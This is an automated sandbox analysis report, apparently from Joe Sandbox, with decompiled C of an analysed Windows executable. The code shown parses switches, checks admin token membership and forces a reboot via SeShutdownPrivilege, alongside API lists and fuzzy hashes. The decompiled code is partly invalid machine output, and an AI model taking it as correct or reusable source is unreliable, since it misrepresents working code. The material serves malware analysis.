                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FreeGlobal
                              • String ID:
                              • API String ID: 2979337801-0
                              • Opcode ID: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                              • Instruction ID: 89846b3abdaae744b0e51e7ab2470597cf8d385939833bc7a2d7408c655d6ef5
                              • Opcode Fuzzy Hash: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                              • Instruction Fuzzy Hash: 5EB0123100010CF78F101A43E8088453F5DD6C47707000010F50C460118B3B98118684
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E010E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				signed int _v12;
                              				CHAR* _v265;
                              				char _v266;
                              				char _v267;
                              				char _v268;
                              				CHAR* _v272;
                              				char _v276;
                              				signed int _v296;
                              				char _v556;
                              				signed int _t61;
                              				int _t63;
                              				char _t67;
                              				CHAR* _t69;
                              				signed int _t71;
                              				void* _t75;
                              				char _t79;
                              				void* _t83;
                              				void* _t85;
                              				void* _t87;
                              				intOrPtr _t88;
                              				void* _t100;
                              				intOrPtr _t101;
                              				CHAR* _t104;
                              				intOrPtr _t105;
                              				void* _t111;
                              				void* _t115;
                              				CHAR* _t118;
                              				void* _t119;
                              				void* _t127;
                              				CHAR* _t129;
                              				void* _t132;
                              				void* _t142;
                              				signed int _t143;
                              				CHAR* _t144;
                              				void* _t145;
                              				void* _t146;
                              				void* _t147;
                              				void* _t149;
                              				char _t155;
                              				void* _t157;
                              				void* _t162;
                              				void* _t163;
                              				char _t167;
                              				char _t170;
                              				CHAR* _t173;
                              				void* _t177;
                              				intOrPtr* _t183;
                              				intOrPtr* _t192;
                              				CHAR* _t199;
                              				void* _t200;
                              				CHAR* _t201;
                              				void* _t205;
                              				void* _t206;
                              				int _t209;
                              				void* _t210;
                              				void* _t212;
                              				void* _t213;
                              				CHAR* _t218;
                              				intOrPtr* _t219;
                              				intOrPtr* _t220;
                              				signed int _t221;
                              				signed int _t223;
                              
                              				_t173 = __ecx;
                              				_t61 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t61 ^ _t221;
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t209 = 1;
                              				if(__ecx == 0 ||  *__ecx == 0) {
                              					_t63 = 1;
                              				} else {
                              					L2:
                              					while(_t209 != 0) {
                              						_t67 =  *_t173;
                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                              							_t173 = CharNextA(_t173);
                              							continue;
                              						}
                              						_v272 = _t173;
                              						if(_t67 == 0) {
                              							break;
                              						} else {
                              							_t69 = _v272;
                              							_t177 = 0;
                              							_t213 = 0;
                              							_t163 = 0;
                              							_t202 = 1;
                              							do {
                              								if(_t213 != 0) {
                              									if(_t163 != 0) {
                              										break;
                              									} else {
                              										goto L21;
                              									}
                              								} else {
                              									_t69 =  *_t69;
                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                              										break;
                              									} else {
                              										_t69 = _v272;
                              										L21:
                              										_t155 =  *_t69;
                              										if(_t155 != 0x22) {
                              											if(_t202 >= 0x104) {
                              												goto L106;
                              											} else {
                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                              												_t177 = _t177 + 1;
                              												_t202 = _t202 + 1;
                              												_t157 = 1;
                              												goto L30;
                              											}
                              										} else {
                              											if(_v272[1] == 0x22) {
                              												if(_t202 >= 0x104) {
                              													L106:
                              													_t63 = 0;
                              													L125:
                              													_pop(_t210);
                              													_pop(_t212);
                              													_pop(_t162);
                              													return E010E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                              												} else {
                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                              													_t177 = _t177 + 1;
                              													_t202 = _t202 + 1;
                              													_t157 = 2;
                              													goto L30;
                              												}
                              											} else {
                              												_t157 = 1;
                              												if(_t213 != 0) {
                              													_t163 = 1;
                              												} else {
                              													_t213 = 1;
                              												}
                              												goto L30;
                              											}
                              										}
                              									}
                              								}
                              								goto L131;
                              								L30:
                              								_v272 =  &(_v272[_t157]);
                              								_t69 = _v272;
                              							} while ( *_t69 != 0);
                              							if(_t177 >= 0x104) {
                              								E010E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                              								asm("int3");
                              								_push(_t221);
                              								_t222 = _t223;
                              								_t71 =  *0x10e8004; // 0x9fdbf5b5
                              								_v296 = _t71 ^ _t223;
                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                              									0x4f0 = 2;
                              									_t75 = E010E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                              								} else {
                              									E010E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                              									 *0x10e9124 = E010E6285();
                              									_t75 = 0;
                              								}
                              								return E010E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                              							} else {
                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                              								if(_t213 == 0) {
                              									if(_t163 != 0) {
                              										goto L34;
                              									} else {
                              										goto L40;
                              									}
                              								} else {
                              									if(_t163 != 0) {
                              										L40:
                              										_t79 = _v268;
                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                              											_t83 = CharUpperA(_v267) - 0x3f;
                              											if(_t83 == 0) {
                              												_t202 = 0x521;
                              												E010E44B9(0, 0x521, 0x10e1140, 0, 0x40, 0);
                              												_t85 =  *0x10e8588; // 0x0
                              												if(_t85 != 0) {
                              													CloseHandle(_t85);
                              												}
                              												ExitProcess(0);
                              											}
                              											_t87 = _t83 - 4;
                              											if(_t87 == 0) {
                              												if(_v266 != 0) {
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                              														_t215 =  &_v268 + _t167;
                              														_t183 =  &_v268 + _t167;
                              														_t50 = _t183 + 1; // 0x1
                              														_t202 = _t50;
                              														do {
                              															_t88 =  *_t183;
                              															_t183 = _t183 + 1;
                              														} while (_t88 != 0);
                              														if(_t183 == _t202) {
                              															goto L49;
                              														} else {
                              															_t205 = 0x5b;
                              															if(E010E667F(_t215, _t205) == 0) {
                              																L115:
                              																_t206 = 0x5d;
                              																if(E010E667F(_t215, _t206) == 0) {
                              																	L117:
                              																	_t202 =  &_v276;
                              																	_v276 = _t167;
                              																	if(E010E5C17(_t215,  &_v276) == 0) {
                              																		goto L49;
                              																	} else {
                              																		_t202 = 0x104;
                              																		E010E1680(0x10e8c42, 0x104, _v276 + _t167 +  &_v268);
                              																	}
                              																} else {
                              																	_t202 = 0x5b;
                              																	if(E010E667F(_t215, _t202) == 0) {
                              																		goto L49;
                              																	} else {
                              																		goto L117;
                              																	}
                              																}
                              															} else {
                              																_t202 = 0x5d;
                              																if(E010E667F(_t215, _t202) == 0) {
                              																	goto L49;
                              																} else {
                              																	goto L115;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													 *0x10e8a24 = 1;
                              												}
                              												goto L50;
                              											} else {
                              												_t100 = _t87 - 1;
                              												if(_t100 == 0) {
                              													L98:
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                              														_t217 =  &_v268 + _t170;
                              														_t192 =  &_v268 + _t170;
                              														_t38 = _t192 + 1; // 0x1
                              														_t202 = _t38;
                              														do {
                              															_t101 =  *_t192;
                              															_t192 = _t192 + 1;
                              														} while (_t101 != 0);
                              														if(_t192 == _t202) {
                              															goto L49;
                              														} else {
                              															_t202 =  &_v276;
                              															_v276 = _t170;
                              															if(E010E5C17(_t217,  &_v276) == 0) {
                              																goto L49;
                              															} else {
                              																_t104 = CharUpperA(_v267);
                              																_t218 = 0x10e8b3e;
                              																_t105 = _v276;
                              																if(_t104 != 0x54) {
                              																	_t218 = 0x10e8a3a;
                              																}
                              																E010E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                              																_t202 = 0x104;
                              																E010E658A(_t218, 0x104, 0x10e1140);
                              																if(E010E31E0(_t218) != 0) {
                              																	goto L50;
                              																} else {
                              																	goto L106;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													_t111 = _t100 - 0xa;
                              													if(_t111 == 0) {
                              														if(_v266 != 0) {
                              															if(_v266 != 0x3a) {
                              																goto L49;
                              															} else {
                              																_t199 = _v265;
                              																if(_t199 != 0) {
                              																	_t219 =  &_v265;
                              																	do {
                              																		_t219 = _t219 + 1;
                              																		_t115 = CharUpperA(_t199) - 0x45;
                              																		if(_t115 == 0) {
                              																			 *0x10e8a2c = 1;
                              																		} else {
                              																			_t200 = 2;
                              																			_t119 = _t115 - _t200;
                              																			if(_t119 == 0) {
                              																				 *0x10e8a30 = 1;
                              																			} else {
                              																				if(_t119 == 0xf) {
                              																					 *0x10e8a34 = 1;
                              																				} else {
                              																					_t209 = 0;
                              																				}
                              																			}
                              																		}
                              																		_t118 =  *_t219;
                              																		_t199 = _t118;
                              																	} while (_t118 != 0);
                              																}
                              															}
                              														} else {
                              															 *0x10e8a2c = 1;
                              														}
                              														goto L50;
                              													} else {
                              														_t127 = _t111 - 3;
                              														if(_t127 == 0) {
                              															if(_v266 != 0) {
                              																if(_v266 != 0x3a) {
                              																	goto L49;
                              																} else {
                              																	_t129 = CharUpperA(_v265);
                              																	if(_t129 == 0x31) {
                              																		goto L76;
                              																	} else {
                              																		if(_t129 == 0x41) {
                              																			goto L83;
                              																		} else {
                              																			if(_t129 == 0x55) {
                              																				goto L76;
                              																			} else {
                              																				goto L49;
                              																			}
                              																		}
                              																	}
                              																}
                              															} else {
                              																L76:
                              																_push(2);
                              																_pop(1);
                              																L83:
                              																 *0x10e8a38 = 1;
                              															}
                              															goto L50;
                              														} else {
                              															_t132 = _t127 - 1;
                              															if(_t132 == 0) {
                              																if(_v266 != 0) {
                              																	if(_v266 != 0x3a) {
                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                              																			goto L49;
                              																		}
                              																	} else {
                              																		_t201 = _v265;
                              																		 *0x10e9a2c = 1;
                              																		if(_t201 != 0) {
                              																			_t220 =  &_v265;
                              																			do {
                              																				_t220 = _t220 + 1;
                              																				_t142 = CharUpperA(_t201) - 0x41;
                              																				if(_t142 == 0) {
                              																					_t143 = 2;
                              																					 *0x10e9a2c =  *0x10e9a2c | _t143;
                              																					goto L70;
                              																				} else {
                              																					_t145 = _t142 - 3;
                              																					if(_t145 == 0) {
                              																						 *0x10e8d48 =  *0x10e8d48 | 0x00000040;
                              																					} else {
                              																						_t146 = _t145 - 5;
                              																						if(_t146 == 0) {
                              																							 *0x10e9a2c =  *0x10e9a2c & 0xfffffffd;
                              																							goto L70;
                              																						} else {
                              																							_t147 = _t146 - 5;
                              																							if(_t147 == 0) {
                              																								 *0x10e9a2c =  *0x10e9a2c & 0xfffffffe;
                              																								goto L70;
                              																							} else {
                              																								_t149 = _t147;
                              																								if(_t149 == 0) {
                              																									 *0x10e8d48 =  *0x10e8d48 | 0x00000080;
                              																								} else {
                              																									if(_t149 == 3) {
                              																										 *0x10e9a2c =  *0x10e9a2c | 0x00000004;
                              																										L70:
                              																										 *0x10e8a28 = 1;
                              																									} else {
                              																										_t209 = 0;
                              																									}
                              																								}
                              																							}
                              																						}
                              																					}
                              																				}
                              																				_t144 =  *_t220;
                              																				_t201 = _t144;
                              																			} while (_t144 != 0);
                              																		}
                              																	}
                              																} else {
                              																	 *0x10e9a2c = 3;
                              																	 *0x10e8a28 = 1;
                              																}
                              																goto L50;
                              															} else {
                              																if(_t132 == 0) {
                              																	goto L98;
                              																} else {
                              																	L49:
                              																	_t209 = 0;
                              																	L50:
                              																	_t173 = _v272;
                              																	if( *_t173 != 0) {
                              																		goto L2;
                              																	} else {
                              																		break;
                              																	}
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              										} else {
                              											goto L106;
                              										}
                              									} else {
                              										L34:
                              										_t209 = 0;
                              										break;
                              									}
                              								}
                              							}
                              						}
                              						goto L131;
                              					}
                              					if( *0x10e8a2c != 0 &&  *0x10e8b3e == 0) {
                              						if(GetModuleFileNameA( *0x10e9a3c, 0x10e8b3e, 0x104) == 0) {
                              							_t209 = 0;
                              						} else {
                              							_t202 = 0x5c;
                              							 *((char*)(E010E66C8(0x10e8b3e, _t202) + 1)) = 0;
                              						}
                              					}
                              					_t63 = _t209;
                              				}
                              				L131:
                              			}

                              0x010e6006
                              0x010e6011
                              0x010e6014
                              0x010e603d
                              0x010e6016
                              0x010e6018
                              0x010e6019
                              0x010e601b
                              0x010e6033
                              0x010e601d
                              0x010e6020
                              0x010e6029
                              0x010e6022
                              0x010e6022
                              0x010e6022
                              0x010e6020
                              0x010e601b
                              0x010e6042
                              0x010e6044
                              0x010e6046
                              0x010e604a
                              0x010e5ff7
                              0x010e5fd5
                              0x010e5fd8
                              0x010e5fd8
                              0x00000000
                              0x010e5e6b
                              0x010e5e6b
                              0x010e5e6e
                              0x010e5f8b
                              0x010e5f99
                              0x00000000
                              0x010e5f9f
                              0x010e5fa7
                              0x010e5faf
                              0x00000000
                              0x010e5fb1
                              0x010e5fb3
                              0x00000000
                              0x010e5fb5
                              0x010e5fb7
                              0x00000000
                              0x010e5fb9
                              0x00000000
                              0x010e5fb9
                              0x010e5fb7
                              0x010e5fb3
                              0x010e5faf
                              0x010e5f8d
                              0x010e5f8d
                              0x010e5f8d
                              0x010e5f8f
                              0x010e5fc1
                              0x010e5fc1
                              0x010e5fc1
                              0x00000000
                              0x010e5e74
                              0x010e5e74
                              0x010e5e77
                              0x010e5ea0
                              0x010e5ebd
                              0x010e5f79
                              0x00000000
                              0x010e5f7f
                              0x010e5ec3
                              0x010e5ec3
                              0x010e5ecc
                              0x010e5ed4
                              0x010e5ed6
                              0x010e5edc
                              0x010e5edf
                              0x010e5eea
                              0x010e5eed
                              0x010e5f3f
                              0x010e5f40
                              0x00000000
                              0x010e5eef
                              0x010e5eef
                              0x010e5ef2
                              0x010e5f34
                              0x010e5ef4
                              0x010e5ef4
                              0x010e5ef7
                              0x010e5f2b
                              0x00000000
                              0x010e5ef9
                              0x010e5ef9
                              0x010e5efc
                              0x010e5f22
                              0x00000000
                              0x010e5efe
                              0x010e5eff
                              0x010e5f02
                              0x010e5f16
                              0x010e5f04
                              0x010e5f07
                              0x010e5f0d
                              0x010e5f46
                              0x010e5f46
                              0x010e5f09
                              0x010e5f09
                              0x010e5f09
                              0x010e5f07
                              0x010e5f02
                              0x010e5efc
                              0x010e5ef7
                              0x010e5ef2
                              0x010e5f4c
                              0x010e5f4e
                              0x010e5f50
                              0x010e5f54
                              0x010e5ed4
                              0x010e5ea2
                              0x010e5ea4
                              0x010e5eaf
                              0x010e5eaf
                              0x00000000
                              0x010e5e79
                              0x010e5e7d
                              0x00000000
                              0x010e5e83
                              0x010e5e83
                              0x010e5e83
                              0x010e5e85
                              0x010e5e85
                              0x010e5e8e
                              0x00000000
                              0x010e5e94
                              0x00000000
                              0x010e5e94
                              0x010e5e8e
                              0x010e5e7d
                              0x010e5e77
                              0x010e5e6e
                              0x010e5e65
                              0x010e5e5c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5dd0
                              0x010e5dd0
                              0x010e5dd0
                              0x00000000
                              0x010e5dd0
                              0x010e5dce
                              0x010e5dca
                              0x010e5dba
                              0x00000000
                              0x010e5d00
                              0x010e5dd9
                              0x010e5e04
                              0x010e61fe
                              0x010e5e0a
                              0x010e5e0c
                              0x010e5e17
                              0x010e5e17
                              0x010e5e04
                              0x010e6200
                              0x010e6200
                              0x00000000

                              APIs
                              • CharNextA.USER32(?,00000000,?,?), ref: 010E5CEE
                              • GetModuleFileNameA.KERNEL32(010E8B3E,00000104,00000000,?,?), ref: 010E5DFC
                              • CharUpperA.USER32(?), ref: 010E5E3E
                              • CharUpperA.USER32(-00000052), ref: 010E5EE1
                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010E5F6F
                              • CharUpperA.USER32(?), ref: 010E5FA7
                              • CharUpperA.USER32(-0000004E), ref: 010E6008
                              • CharUpperA.USER32(?), ref: 010E60AA
                              • CloseHandle.KERNEL32(00000000,010E1140,00000000,00000040,00000000), ref: 010E61F1
                              • ExitProcess.KERNEL32 ref: 010E61F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                              • String ID: "$"$:$RegServer
                              • API String ID: 1203814774-25366791
                              • Opcode ID: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
                              • Instruction ID: 4d1d7668cb53b73fbf899846024cc30998f6d7bad23f86839eee7e095a2f5fe3
                              • Opcode Fuzzy Hash: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
                              • Instruction Fuzzy Hash: 29D17035A082555EEFBA8A3F9C4C3FA3FF19B1530CF0849DAD5D6DA145D67689828F00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E010E18A3(void* __edx, void* __esi) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				char _v20;
                              				long _v24;
                              				void* _v28;
                              				void* _v32;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t23;
                              				long _t45;
                              				void* _t49;
                              				int _t50;
                              				void* _t52;
                              				signed int _t53;
                              
                              				_t51 = __esi;
                              				_t49 = __edx;
                              				_t23 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t23 ^ _t53;
                              				_t25 =  *0x10e8128; // 0x2
                              				_t45 = 0;
                              				_v12 = 0x500;
                              				_t50 = 2;
                              				_v16.Value = 0;
                              				_v20 = 0;
                              				if(_t25 != _t50) {
                              					L20:
                              					return E010E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                              				}
                              				if(E010E17EE( &_v20) != 0) {
                              					_t25 = _v20;
                              					if(_v20 != 0) {
                              						 *0x10e8128 = 1;
                              					}
                              					goto L20;
                              				}
                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                              					goto L20;
                              				}
                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                              					L17:
                              					CloseHandle(_v28);
                              					_t25 = _v20;
                              					goto L20;
                              				} else {
                              					_push(__esi);
                              					_t52 = LocalAlloc(0, _v24);
                              					if(_t52 == 0) {
                              						L16:
                              						_pop(_t51);
                              						goto L17;
                              					}
                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                              						L15:
                              						LocalFree(_t52);
                              						goto L16;
                              					} else {
                              						if( *_t52 <= 0) {
                              							L14:
                              							FreeSid(_v32);
                              							goto L15;
                              						}
                              						_t15 = _t52 + 4; // 0x4
                              						_t50 = _t15;
                              						while(EqualSid( *_t50, _v32) == 0) {
                              							_t45 = _t45 + 1;
                              							_t50 = _t50 + 8;
                              							if(_t45 <  *_t52) {
                              								continue;
                              							}
                              							goto L14;
                              						}
                              						 *0x10e8128 = 1;
                              						_v20 = 1;
                              						goto L14;
                              					}
                              				}
                              			}

                              APIs
                                • Part of subcall function 010E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                                • Part of subcall function 010E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                                • Part of subcall function 010E17EE: AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                                • Part of subcall function 010E17EE: FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                                • Part of subcall function 010E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010E18EB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 010E18F2
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010E190A
                              • GetLastError.KERNEL32 ref: 010E1918
                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 010E192C
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010E1944
                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010E1964
                              • EqualSid.ADVAPI32(00000004,?), ref: 010E197A
                              • FreeSid.ADVAPI32(?), ref: 010E199C
                              • LocalFree.KERNEL32(00000000), ref: 010E19A3
                              • CloseHandle.KERNEL32(?), ref: 010E19AD
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                              • String ID:
                              • API String ID: 2168512254-0
                              • Opcode ID: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                              • Instruction ID: 18180af1d8adf701d10543581c6c9c8e96629bb7e2e6510eb08b9fc8d0bd5f48
                              • Opcode Fuzzy Hash: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                              • Instruction Fuzzy Hash: 64312A71A00209EFDB609FA6DC88AAFBFFCFF48B50B104469F685E6154D73699048B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E010E1F90(signed int __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				int _v12;
                              				struct _TOKEN_PRIVILEGES _v24;
                              				void* _v28;
                              				void* __ebx;
                              				signed int _t13;
                              				int _t21;
                              				void* _t25;
                              				int _t28;
                              				signed char _t30;
                              				void* _t38;
                              				void* _t40;
                              				void* _t41;
                              				signed int _t46;
                              
                              				_t41 = __esi;
                              				_t38 = __edi;
                              				_t30 = __ecx;
                              				if((__ecx & 0x00000002) != 0) {
                              					L12:
                              					if((_t30 & 0x00000004) != 0) {
                              						L14:
                              						if( *0x10e9a40 != 0) {
                              							_pop(_t30);
                              							_t44 = _t46;
                              							_t13 =  *0x10e8004; // 0x9fdbf5b5
                              							_v8 = _t13 ^ _t46;
                              							_push(_t38);
                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                              								_v24.PrivilegeCount = 1;
                              								_v12 = 2;
                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                              								CloseHandle(_v28);
                              								_t41 = _t41;
                              								_push(0);
                              								if(_t21 != 0) {
                              									if(ExitWindowsEx(2, ??) != 0) {
                              										_t25 = 1;
                              									} else {
                              										_t37 = 0x4f7;
                              										goto L3;
                              									}
                              								} else {
                              									_t37 = 0x4f6;
                              									goto L4;
                              								}
                              							} else {
                              								_t37 = 0x4f5;
                              								L3:
                              								_push(0);
                              								L4:
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								E010E44B9(0, _t37);
                              								_t25 = 0;
                              							}
                              							_pop(_t40);
                              							return E010E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                              						} else {
                              							_t28 = ExitWindowsEx(2, 0);
                              							goto L16;
                              						}
                              					} else {
                              						_t37 = 0x522;
                              						_t28 = E010E44B9(0, 0x522, 0x10e1140, 0, 0x40, 4);
                              						if(_t28 != 6) {
                              							goto L16;
                              						} else {
                              							goto L14;
                              						}
                              					}
                              				} else {
                              					__eax = E010E1EA7(__ecx);
                              					if(__eax != 2) {
                              						L16:
                              						return _t28;
                              					} else {
                              						goto L12;
                              					}
                              				}
                              			}

                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010E1EFB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 010E1F02
                              • ExitWindowsEx.USER32(00000002,00000000), ref: 010E1FD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Process$CurrentExitOpenTokenWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2795981589-3733053543
                              • Opcode ID: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                              • Instruction ID: f1085c14d9b5bb200b842003d64a3963fad5068585b62586bb81ad08b2ea23ca
                              • Opcode Fuzzy Hash: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                              • Instruction Fuzzy Hash: 1021D6B1B40205AEDB305AA79C4DFBF7AF8EB99B51F100059FA82DA185D779C80183A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E7155() {
                              				void* _v8;
                              				struct _FILETIME _v16;
                              				signed int _v20;
                              				union _LARGE_INTEGER _v24;
                              				signed int _t23;
                              				signed int _t36;
                              				signed int _t37;
                              				signed int _t39;
                              
                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                              				_t23 =  *0x10e8004; // 0x9fdbf5b5
                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                              					GetSystemTimeAsFileTime( &_v16);
                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                              					_v8 = _v8 ^ GetCurrentProcessId();
                              					_v8 = _v8 ^ GetCurrentThreadId();
                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                              					QueryPerformanceCounter( &_v24);
                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                              					_t39 = _t36;
                              					if(_t36 == 0xbb40e64e || ( *0x10e8004 & 0xffff0000) == 0) {
                              						_t36 = 0xbb40e64f;
                              						_t39 = 0xbb40e64f;
                              					}
                              					 *0x10e8004 = _t39;
                              				}
                              				_t37 =  !_t36;
                              				"J\n$`System\\CurrentControlSet\\Control\\Session Manager" = _t37;
                              				return _t37;
                              			}

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                              • GetCurrentProcessId.KERNEL32 ref: 010E7191
                              • GetCurrentThreadId.KERNEL32 ref: 010E719A
                              • GetTickCount.KERNEL32 ref: 010E71A3
                              • QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                              Strings
                              • J$`System\CurrentControlSet\Control\Session Manager, xrefs: 010E71E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                              • String ID: J$`System\CurrentControlSet\Control\Session Manager
                              • API String ID: 1445889803-1491229363
                              • Opcode ID: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
